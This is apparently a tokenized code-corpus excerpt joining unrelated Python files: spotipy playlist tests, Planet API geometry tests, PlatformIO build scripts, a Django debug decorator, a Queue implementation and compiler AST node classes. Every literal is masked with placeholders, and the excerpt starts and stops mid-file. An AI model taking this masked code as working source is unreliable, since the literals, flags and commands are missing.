<EOL> self . assertTrue ( len ( response [ '<STR_LIT>' ] ) > <NUM_LIT:0> ) <EOL> def test_current_user_follows ( self ) : <EOL> response = spotify . current_user_followed_artists ( ) <EOL> artists = response [ '<STR_LIT>' ] <EOL> self . assertTrue ( len ( artists [ '<STR_LIT>' ] ) > <NUM_LIT:0> ) <EOL> def test_current_user_top_tracks ( self ) : <EOL> response = spotify . current_user_top_tracks ( ) <EOL> items = response [ '<STR_LIT>' ] <EOL> self . assertTrue ( len ( items ) > <NUM_LIT:0> ) <EOL> def test_current_user_top_artists ( self ) : <EOL> response = spotify . current_user_top_artists ( ) <EOL> items = response [ '<STR_LIT>' ] <EOL> self . assertTrue ( len ( items ) > <NUM_LIT:0> ) <EOL> def get_or_create_spotify_playlist ( self , username , playlist_name ) : <EOL> playlists = spotify . user_playlists ( username ) <EOL> while playlists : <EOL> for item in playlists [ '<STR_LIT>' ] : <EOL> if item [ '<STR_LIT:name>' ] == playlist_name : <EOL> return item [ '<STR_LIT:id>' ] <EOL> playlists = spotify . next ( playlists ) <EOL> playlist = spotify . user_playlist_create ( username , playlist_name ) <EOL> playlist_id = playlist [ '<STR_LIT>' ] <EOL> return playlist_id <EOL> def test_user_playlist_ops ( self ) : <EOL> playlist_id = self . get_or_create_spotify_playlist ( username , <EOL> '<STR_LIT>' ) <EOL> spotify . user_playlist_replace_tracks ( username , playlist_id , [ ] ) <EOL> playlist = spotify . user_playlist ( username , playlist_id ) <EOL> self . assertTrue ( playlist [ '<STR_LIT>' ] [ '<STR_LIT>' ] == <NUM_LIT:0> ) <EOL> self . assertTrue ( len ( playlist [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) == <NUM_LIT:0> ) <EOL> spotify . user_playlist_add_tracks ( username , playlist_id , self . four_tracks ) <EOL> playlist = spotify . user_playlist ( username , playlist_id ) <EOL> self . assertTrue ( playlist [ '<STR_LIT>' ] [ '<STR_LIT>' ] == <NUM_LIT:4> ) <EOL> self . assertTrue ( len ( playlist [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) == <NUM_LIT:4> ) <EOL> spotify . user_playlist_remove_all_occurrences_of_tracks ( username , <EOL> playlist_id , self . two_tracks ) <EOL> playlist = spotify . user_playlist ( username , playlist_id ) <EOL> self . assertTrue ( playlist [ '<STR_LIT>' ] [ '<STR_LIT>' ] == <NUM_LIT:2> ) <EOL> self . assertTrue ( len ( playlist [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) == <NUM_LIT:2> ) <EOL> spotify . user_playlist_replace_tracks ( username , <EOL> playlist_id , self . other_tracks ) <EOL> playlist = spotify . user_playlist ( username , playlist_id ) <EOL> self . assertTrue ( playlist [ '<STR_LIT>' ] [ '<STR_LIT>' ] == <NUM_LIT:3> ) <EOL> self . assertTrue ( len ( playlist [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) == <NUM_LIT:3> ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> if len ( sys . argv ) > <NUM_LIT:1> : <EOL> username = sys . argv [ <NUM_LIT:1> ] <EOL> del sys . argv [ <NUM_LIT:1> ] <EOL> scope = '<STR_LIT>' <EOL> scope += '<STR_LIT>' <EOL> scope += '<STR_LIT>' <EOL> scope += '<STR_LIT>' <EOL> scope += '<STR_LIT>' <EOL> scope += '<STR_LIT>' <EOL> token = util . prompt_for_user_token ( username , scope ) <EOL> spotify = spotipy . Spotify ( auth = token ) <EOL> spotify . trace = False <EOL> unittest . main ( ) <EOL> else : <EOL> print ( "<STR_LIT>" % ( sys . argv [ <NUM_LIT:0> ] , ) ) </s>
<s> import json <EOL> from planet . api import utils <EOL> from _common import read_fixture <EOL> def test_geometry_from_json ( ) : <EOL> assert None is utils . geometry_from_json ( { } ) <EOL> collection = { '<STR_LIT:type>' : '<STR_LIT>' , '<STR_LIT>' : [ ] } <EOL> assert None is utils . geometry_from_json ( collection ) <EOL> geom = { '<STR_LIT:type>' : '<STR_LIT>' } <EOL> assert geom == utils . geometry_from_json ( geom ) <EOL> feature = { '<STR_LIT:type>' : '<STR_LIT>' , '<STR_LIT>' : geom } <EOL> assert geom == utils . geometry_from_json ( feature ) <EOL> collection = { '<STR_LIT:type>' : '<STR_LIT>' , '<STR_LIT>' : [ feature ] } <EOL> assert geom == utils . geometry_from_json ( collection ) <EOL> def test_build_conditions ( ) : <EOL> workspace = json . loads ( read_fixture ( '<STR_LIT>' ) ) <EOL> c = utils . build_conditions ( workspace ) <EOL> assert c [ '<STR_LIT>' ] == '<STR_LIT>' <EOL> assert c [ '<STR_LIT>' ] == <NUM_LIT:10> <EOL> assert c [ '<STR_LIT>' ] == <NUM_LIT> <EOL> assert c [ '<STR_LIT>' ] == <NUM_LIT:200> <EOL> assert c [ '<STR_LIT>' ] == <NUM_LIT> <EOL> assert c [ '<STR_LIT>' ] == <NUM_LIT> <EOL> def test_probably_wkt ( ) : <EOL> assert not utils . probably_wkt ( '<STR_LIT>' ) <EOL> assert not utils . probably_wkt ( '<STR_LIT>' ) <EOL> assert not utils . probably_wkt ( '<STR_LIT>' ) <EOL> assert not utils . probably_wkt ( '<STR_LIT>' ) <EOL> wkt = read_fixture ( '<STR_LIT>' ) . split ( '<STR_LIT:\n>' ) <EOL> assert len ( wkt ) > <NUM_LIT:0> <EOL> for valid in wkt : <EOL> assert utils . probably_wkt ( valid ) <EOL> def test_probably_geojson ( ) : <EOL> assert utils . probably_geojson ( '<STR_LIT>' ) is None <EOL> assert utils . probably_geojson ( '<STR_LIT:{}>' ) is None <EOL> assert utils . probably_geojson ( { } ) is None <EOL> assert utils . probably_geojson ( { '<STR_LIT:type>' : '<STR_LIT>' } ) is None <EOL> assert utils . probably_geojson ( { '<STR_LIT:type>' : '<STR_LIT>' } ) == { '<STR_LIT:type>' : '<STR_LIT>' } <EOL> assert utils . probably_geojson ( '<STR_LIT>' ) == { '<STR_LIT:type>' : '<STR_LIT>' } </s>
<s> """<STR_LIT>""" <EOL> from os . path import basename , join <EOL> from SCons . Script import ( COMMAND_LINE_TARGETS , AlwaysBuild , Default , <EOL> DefaultEnvironment , SConscript ) <EOL> from platformio . util import get_serialports <EOL> def BeforeUpload ( target , source , env ) : <EOL> env . AutodetectUploadPort ( ) <EOL> board_type = env . subst ( "<STR_LIT>" ) <EOL> if "<STR_LIT>" not in board_type : <EOL> env . Append ( <EOL> UPLOADERFLAGS = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT:true>" if ( "<STR_LIT>" in board_type . lower ( <EOL> ) or board_type == "<STR_LIT>" ) else "<STR_LIT:false>" <EOL> ] ) <EOL> upload_options = env . get ( "<STR_LIT>" , { } ) . get ( "<STR_LIT>" , { } ) <EOL> if not upload_options . get ( "<STR_LIT>" , False ) : <EOL> env . FlushSerialBuffer ( "<STR_LIT>" ) <EOL> before_ports = [ i [ '<STR_LIT:port>' ] for i in get_serialports ( ) ] <EOL> if upload_options . get ( "<STR_LIT>" , False ) : <EOL> env . TouchSerialPort ( "<STR_LIT>" , <NUM_LIT> ) <EOL> if upload_options . get ( "<STR_LIT>" , False ) : <EOL> env . Replace ( UPLOAD_PORT = env . WaitForNewSerialPort ( before_ports ) ) <EOL> if "<STR_LIT:/>" in env . subst ( "<STR_LIT>" ) : <EOL> env . Replace ( UPLOAD_PORT = basename ( env . subst ( "<STR_LIT>" ) ) ) <EOL> env = DefaultEnvironment ( ) <EOL> SConscript ( env . subst ( join ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) ) ) <EOL> if env . subst ( "<STR_LIT>" ) == "<STR_LIT>" : <EOL> env . Replace ( <EOL> UPLOADER = join ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> UPLOADERFLAGS = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> join ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> "<STR_LIT>" , <EOL> join ( <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ) , <EOL> "<STR_LIT:-c>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" <EOL> ] , <EOL> UPLOADCMD = '<STR_LIT>' <EOL> ) <EOL> else : <EOL> env . Replace ( <EOL> UPLOADER = join ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> UPLOADERFLAGS = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , '<STR_LIT>' , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] , <EOL> UPLOADCMD = '<STR_LIT>' <EOL> ) <EOL> env . Append ( <EOL> CCFLAGS = [ <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] , <EOL> CFLAGS = [ <EOL> "<STR_LIT>" <EOL> ] , <EOL> CXXFLAGS = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] , <EOL> CPPDEFINES = [ <EOL> "<STR_LIT>" , <EOL> '<STR_LIT>' <EOL> ] , <EOL> LINKFLAGS = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> ) <EOL> if "<STR_LIT>" in env . get ( "<STR_LIT>" , { } ) . get ( "<STR_LIT>" , { } ) . get ( "<STR_LIT>" , None ) : <EOL> env . Append ( <EOL> CPPDEFINES = [ <EOL> "<STR_LIT>" <EOL> ] , <EOL> LINKFLAGS = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] , <EOL> UPLOADERFLAGS = [ <EOL> "<STR_LIT>" , <EOL> ] <EOL> ) <EOL> elif "<STR_LIT>" in env . subst ( "<STR_LIT>" ) : <EOL> env . Append ( <EOL> LINKFLAGS = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> ) <EOL> target_elf = env . BuildProgram ( ) <EOL> if "<STR_LIT>" in COMMAND_LINE_TARGETS : <EOL> target_firm = join ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> else : <EOL> target_firm = env . ElfToBin ( join ( "<STR_LIT>" , "<STR_LIT>" ) , target_elf ) <EOL> target_size = env . Alias ( "<STR_LIT:size>" , target_elf , "<STR_LIT>" ) <EOL> AlwaysBuild ( target_size ) <EOL> if env . subst ( "<STR_LIT>" ) == "<STR_LIT>" : <EOL> upload = env . Alias ( [ "<STR_LIT>" , "<STR_LIT>" ] , target_firm , "<STR_LIT>" ) <EOL> else : <EOL> upload = env . Alias ( [ "<STR_LIT>" , "<STR_LIT>" ] , target_firm , <EOL> [ BeforeUpload , "<STR_LIT>" ] ) <EOL> AlwaysBuild ( upload ) <EOL> Default ( [ target_firm , target_size ] ) </s>
<s> from hashlib import md5 <EOL> from os . path import join <EOL> from tempfile import gettempdir <EOL> MAX_SOURCES_LENGTH = <NUM_LIT> <EOL> def _huge_sources_hook ( sources ) : <EOL> _sources = str ( sources ) . replace ( "<STR_LIT:\\>" , "<STR_LIT:/>" ) <EOL> if len ( str ( _sources ) ) < MAX_SOURCES_LENGTH : <EOL> return sources <EOL> tmp_file = join ( gettempdir ( ) , "<STR_LIT>" % md5 ( _sources ) . hexdigest ( ) ) <EOL> with open ( tmp_file , "<STR_LIT:w>" ) as f : <EOL> for line in _sources . split ( "<STR_LIT>" ) : <EOL> if not line . endswith ( "<STR_LIT>" ) : <EOL> line += "<STR_LIT>" <EOL> f . write ( '<STR_LIT>' % line ) <EOL> return '<STR_LIT>' % tmp_file <EOL> def exists ( _ ) : <EOL> return True <EOL> def generate ( env ) : <EOL> env . Replace ( <EOL> _huge_sources_hook = _huge_sources_hook , <EOL> ARCOM = env . get ( "<STR_LIT>" , "<STR_LIT>" ) . replace ( <EOL> "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> return env </s>
<s> from platformio . platforms . base import BasePlatform <EOL> from platformio . util import get_systype <EOL> class Linux_i686Platform ( BasePlatform ) : <EOL> """<STR_LIT>""" <EOL> PACKAGES = { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:default>" : True <EOL> } <EOL> } <EOL> def __init__ ( self ) : <EOL> if get_systype ( ) == "<STR_LIT>" : <EOL> del self . PACKAGES [ '<STR_LIT>' ] <EOL> BasePlatform . __init__ ( self ) </s>
<s> import functools <EOL> from django . conf import settings <EOL> from django . http import HttpResponseForbidden <EOL> def debug_required ( fn ) : <EOL> @ functools . wraps ( fn ) <EOL> def wrapper ( * args , ** kwargs ) : <EOL> if not getattr ( settings , '<STR_LIT>' , settings . DEBUG ) : <EOL> return HttpResponseForbidden ( ) <EOL> return fn ( * args , ** kwargs ) <EOL> return wrapper </s>
<s> """<STR_LIT>""" <EOL> from time import time as _time <EOL> from collections import deque <EOL> import heapq <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class Empty ( Exception ) : <EOL> "<STR_LIT>" <EOL> pass <EOL> class Full ( Exception ) : <EOL> "<STR_LIT>" <EOL> pass <EOL> class Queue : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , maxsize = <NUM_LIT:0> ) : <EOL> try : <EOL> import threading <EOL> except ImportError : <EOL> import dummy_threading as threading <EOL> self . maxsize = maxsize <EOL> self . _init ( maxsize ) <EOL> self . mutex = threading . Lock ( ) <EOL> self . not_empty = threading . Condition ( self . mutex ) <EOL> self . not_full = threading . Condition ( self . mutex ) <EOL> self . all_tasks_done = threading . Condition ( self . mutex ) <EOL> self . unfinished_tasks = <NUM_LIT:0> <EOL> def task_done ( self ) : <EOL> """<STR_LIT>""" <EOL> self . all_tasks_done . acquire ( ) <EOL> try : <EOL> unfinished = self . unfinished_tasks - <NUM_LIT:1> <EOL> if unfinished <= <NUM_LIT:0> : <EOL> if unfinished < <NUM_LIT:0> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> self . all_tasks_done . notify_all ( ) <EOL> self . unfinished_tasks = unfinished <EOL> finally : <EOL> self . all_tasks_done . release ( ) <EOL> def join ( self ) : <EOL> """<STR_LIT>""" <EOL> self . all_tasks_done . acquire ( ) <EOL> try : <EOL> while self . unfinished_tasks : <EOL> self . all_tasks_done . wait ( ) <EOL> finally : <EOL> self . all_tasks_done . release ( ) <EOL> def qsize ( self ) : <EOL> """<STR_LIT>""" <EOL> self . mutex . acquire ( ) <EOL> n = self . _qsize ( ) <EOL> self . mutex . release ( ) <EOL> return n <EOL> def empty ( self ) : <EOL> """<STR_LIT>""" <EOL> self . mutex . acquire ( ) <EOL> n = not self . _qsize ( ) <EOL> self . mutex . release ( ) <EOL> return n <EOL> def full ( self ) : <EOL> """<STR_LIT>""" <EOL> self . mutex . acquire ( ) <EOL> n = <NUM_LIT:0> < self . maxsize == self . _qsize ( ) <EOL> self . mutex . release ( ) <EOL> return n <EOL> def put ( self , item , block = True , timeout = None ) : <EOL> """<STR_LIT>""" <EOL> self . not_full . acquire ( ) <EOL> try : <EOL> if self . maxsize > <NUM_LIT:0> : <EOL> if not block : <EOL> if self . _qsize ( ) == self . maxsize : <EOL> raise Full <EOL> elif timeout is None : <EOL> while self . _qsize ( ) == self . maxsize : <EOL> self . not_full . wait ( ) <EOL> elif timeout < <NUM_LIT:0> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> else : <EOL> endtime = _time ( ) + timeout <EOL> while self . _qsize ( ) == self . maxsize : <EOL> remaining = endtime - _time ( ) <EOL> if remaining <= <NUM_LIT:0.0> : <EOL> raise Full <EOL> self . not_full . wait ( remaining ) <EOL> self . _put ( item ) <EOL> self . unfinished_tasks += <NUM_LIT:1> <EOL> self . not_empty . notify ( ) <EOL> finally : <EOL> self . not_full . release ( ) <EOL> def put_nowait ( self , item ) : <EOL> """<STR_LIT>""" <EOL> return self . put ( item , False ) <EOL> def get ( self , block = True , timeout = None ) : <EOL> """<STR_LIT>""" <EOL> self . not_empty . acquire ( ) <EOL> try : <EOL> if not block : <EOL> if not self . _qsize ( ) : <EOL> raise Empty <EOL> elif timeout is None : <EOL> while not self . _qsize ( ) : <EOL> self . not_empty . wait ( ) <EOL> elif timeout < <NUM_LIT:0> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> else : <EOL> endtime = _time ( ) + timeout <EOL> while not self . _qsize ( ) : <EOL> remaining = endtime - _time ( ) <EOL> if remaining <= <NUM_LIT:0.0> : <EOL> raise Empty <EOL> self . not_empty . wait ( remaining ) <EOL> item = self . _get ( ) <EOL> self . not_full . notify ( ) <EOL> return item <EOL> finally : <EOL> self . not_empty . release ( ) <EOL> def get_nowait ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . get ( False ) <EOL> def _init ( self , maxsize ) : <EOL> self . queue = deque ( ) <EOL> def _qsize ( self , len = len ) : <EOL> return len ( self . queue ) <EOL> def _put ( self , item ) : <EOL> self . queue . append ( item ) <EOL> def _get ( self ) : <EOL> return self . queue . popleft ( ) <EOL> class PriorityQueue ( Queue ) : <EOL> '''<STR_LIT>''' <EOL> def _init ( self , maxsize ) : <EOL> self . queue = [ ] <EOL> def _qsize ( self , len = len ) : <EOL> return len ( self . queue ) <EOL> def _put ( self , item , heappush = heapq . heappush ) : <EOL> heappush ( self . queue , item ) <EOL> def _get ( self , heappop = heapq . heappop ) : <EOL> return heappop ( self . queue ) <EOL> class LifoQueue ( Queue ) : <EOL> '''<STR_LIT>''' <EOL> def _init ( self , maxsize ) : <EOL> self . queue = [ ] <EOL> def _qsize ( self , len = len ) : <EOL> return len ( self . queue ) <EOL> def _put ( self , item ) : <EOL> self . queue . append ( item ) <EOL> def _get ( self ) : <EOL> return self . queue . pop ( ) </s>
<s> """<STR_LIT>""" <EOL> from compiler . consts import CO_VARARGS , CO_VARKEYWORDS <EOL> def flatten ( seq ) : <EOL> l = [ ] <EOL> for elt in seq : <EOL> t = type ( elt ) <EOL> if t is tuple or t is list : <EOL> for elt2 in flatten ( elt ) : <EOL> l . append ( elt2 ) <EOL> else : <EOL> l . append ( elt ) <EOL> return l <EOL> def flatten_nodes ( seq ) : <EOL> return [ n for n in flatten ( seq ) if isinstance ( n , Node ) ] <EOL> nodes = { } <EOL> class Node : <EOL> """<STR_LIT>""" <EOL> def getChildren ( self ) : <EOL> pass <EOL> def __iter__ ( self ) : <EOL> for n in self . getChildren ( ) : <EOL> yield n <EOL> def asList ( self ) : <EOL> return self . getChildren ( ) <EOL> def getChildNodes ( self ) : <EOL> pass <EOL> class EmptyNode ( Node ) : <EOL> pass <EOL> class Expression ( Node ) : <EOL> nodes [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> def __init__ ( self , node ) : <EOL> self . node = node <EOL> def getChildren ( self ) : <EOL> return self . node , <EOL> def getChildNodes ( self ) : <EOL> return self . node , <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . node ) ) <EOL> class Add ( Node ) : <EOL> def __init__ ( self , ( left , right ) , lineno = None ) : <EOL> self . left = left <EOL> self . right = right <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . left , self . right <EOL> def getChildNodes ( self ) : <EOL> return self . left , self . right <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . left ) , repr ( self . right ) ) <EOL> class And ( Node ) : <EOL> def __init__ ( self , nodes , lineno = None ) : <EOL> self . nodes = nodes <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return tuple ( flatten ( self . nodes ) ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . extend ( flatten_nodes ( self . nodes ) ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . nodes ) , ) <EOL> class AssAttr ( Node ) : <EOL> def __init__ ( self , expr , attrname , flags , lineno = None ) : <EOL> self . expr = expr <EOL> self . attrname = attrname <EOL> self . flags = flags <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . expr , self . attrname , self . flags <EOL> def getChildNodes ( self ) : <EOL> return self . expr , <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . expr ) , repr ( self . attrname ) , repr ( self . flags ) ) <EOL> class AssList ( Node ) : <EOL> def __init__ ( self , nodes , lineno = None ) : <EOL> self . nodes = nodes <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return tuple ( flatten ( self . nodes ) ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . extend ( flatten_nodes ( self . nodes ) ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . nodes ) , ) <EOL> class AssName ( Node ) : <EOL> def __init__ ( self , name , flags , lineno = None ) : <EOL> self . name = name <EOL> self . flags = flags <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . name , self . flags <EOL> def getChildNodes ( self ) : <EOL> return ( ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . name ) , repr ( self . flags ) ) <EOL> class AssTuple ( Node ) : <EOL> def __init__ ( self , nodes , lineno = None ) : <EOL> self . nodes = nodes <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return tuple ( flatten ( self . nodes ) ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . extend ( flatten_nodes ( self . nodes ) ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . nodes ) , ) <EOL> class Assert ( Node ) : <EOL> def __init__ ( self , test , fail , lineno = None ) : <EOL> self . test = test <EOL> self . fail = fail <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> children = [ ] <EOL> children . append ( self . test ) <EOL> children . append ( self . fail ) <EOL> return tuple ( children ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . append ( self . test ) <EOL> if self . fail is not None : <EOL> nodelist . append ( self . fail ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . test ) , repr ( self . fail ) ) <EOL> class Assign ( Node ) : <EOL> def __init__ ( self , nodes , expr , lineno = None ) : <EOL> self . nodes = nodes <EOL> self . expr = expr <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> children = [ ] <EOL> children . extend ( flatten ( self . nodes ) ) <EOL> children . append ( self . expr ) <EOL> return tuple ( children ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . extend ( flatten_nodes ( self . nodes ) ) <EOL> nodelist . append ( self . expr ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . nodes ) , repr ( self . expr ) ) <EOL> class AugAssign ( Node ) : <EOL> def __init__ ( self , node , op , expr , lineno = None ) : <EOL> self . node = node <EOL> self . op = op <EOL> self . expr = expr <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . node , self . op , self . expr <EOL> def getChildNodes ( self ) : <EOL> return self . node , self . expr <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . node ) , repr ( self . op ) , repr ( self . expr ) ) <EOL> class Backquote ( Node ) : <EOL> def __init__ ( self , expr , lineno = None ) : <EOL> self . expr = expr <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . expr , <EOL> def getChildNodes ( self ) : <EOL> return self . expr , <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . expr ) , ) <EOL> class Bitand ( Node ) : <EOL> def __init__ ( self , nodes , lineno = None ) : <EOL> self . nodes = nodes <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return tuple ( flatten ( self . nodes ) ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . extend ( flatten_nodes ( self . nodes ) ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . nodes ) , ) <EOL> class Bitor ( Node ) : <EOL> def __init__ ( self , nodes , lineno = None ) : <EOL> self . nodes = nodes <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return tuple ( flatten ( self . nodes ) ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . extend ( flatten_nodes ( self . nodes ) ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . nodes ) , ) <EOL> class Bitxor ( Node ) : <EOL> def __init__ ( self , nodes , lineno = None ) : <EOL> self . nodes = nodes <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return tuple ( flatten ( self . nodes ) ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . extend ( flatten_nodes ( self . nodes ) ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . nodes ) , ) <EOL> class Break ( Node ) : <EOL> def __init__ ( self , lineno = None ) : <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return ( ) <EOL> def getChildNodes ( self ) : <EOL> return ( ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" <EOL> class CallFunc ( Node ) : <EOL> def __init__ ( self , node , args , star_args = None , dstar_args = None , lineno = None ) : <EOL> self . node = node <EOL> self . args = args <EOL> self . star_args = star_args <EOL> self . dstar_args = dstar_args <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> children = [ ] <EOL> children . append ( self . node ) <EOL> children . extend ( flatten ( self . args ) ) <EOL> children . append ( self . star_args ) <EOL> children . append ( self . dstar_args ) <EOL> return tuple ( children ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . append ( self . node ) <EOL> nodelist . extend ( flatten_nodes ( self . args ) ) <EOL> if self . star_args is not None : <EOL> nodelist . append ( self . star_args ) <EOL> if self . dstar_args is not None : <EOL> nodelist . append ( self . dstar_args ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . node ) , repr ( self . args ) , repr ( self . star_args ) , repr ( self . dstar_args ) ) <EOL> class Class ( Node ) : <EOL> def __init__ ( self , name , bases , doc , code , decorators = None , lineno = None ) : <EOL> self . name = name <EOL> self . bases = bases <EOL> self . doc = doc <EOL> self . code = code <EOL> self . decorators = decorators <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> children = [ ] <EOL> children . append ( self . name ) <EOL> children . extend ( flatten ( self . bases ) ) <EOL> children . append ( self . doc ) <EOL> children . append ( self . code ) <EOL> children . append ( self . decorators ) <EOL> return tuple ( children ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . extend ( flatten_nodes ( self . bases ) ) <EOL> nodelist . append ( self . code ) <EOL> if self . decorators is not None : <EOL> nodelist . append ( self . decorators ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . name ) , repr ( self . bases ) , repr ( self . doc ) , repr ( self . code ) , repr ( self . decorators ) ) <EOL> class Compare ( Node ) : <EOL> def __init__ ( self , expr , ops , lineno = None ) : <EOL> self . expr = expr <EOL> self . ops = ops <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> children = [ ] <EOL> children . append ( self . expr ) <EOL> children . extend ( flatten ( self . ops ) ) <EOL> return tuple ( children ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . append ( self . expr ) <EOL> nodelist . extend ( flatten_nodes ( self . ops ) ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . expr ) , repr ( self . ops ) ) <EOL> class Const ( Node ) : <EOL> def __init__ ( self , value , lineno = None ) : <EOL> self . value = value <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return self . value , <EOL> def getChildNodes ( self ) : <EOL> return ( ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . value ) , ) <EOL> class Continue ( Node ) : <EOL> def __init__ ( self , lineno = None ) : <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return ( ) <EOL> def getChildNodes ( self ) : <EOL> return ( ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" <EOL> class Decorators ( Node ) : <EOL> def __init__ ( self , nodes , lineno = None ) : <EOL> self . nodes = nodes <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return tuple ( flatten ( self . nodes ) ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . extend ( flatten_nodes ( self . nodes ) ) <EOL> return tuple ( nodelist ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( repr ( self . nodes ) , ) <EOL> class Dict ( Node ) : <EOL> def __init__ ( self , items , lineno = None ) : <EOL> self . items = items <EOL> self . lineno = lineno <EOL> def getChildren ( self ) : <EOL> return tuple ( flatten ( self . items ) ) <EOL> def getChildNodes ( self ) : <EOL> nodelist = [ ] <EOL> nodelist . extend ( flatten_nodes ( self . items ) ) <EOL> return 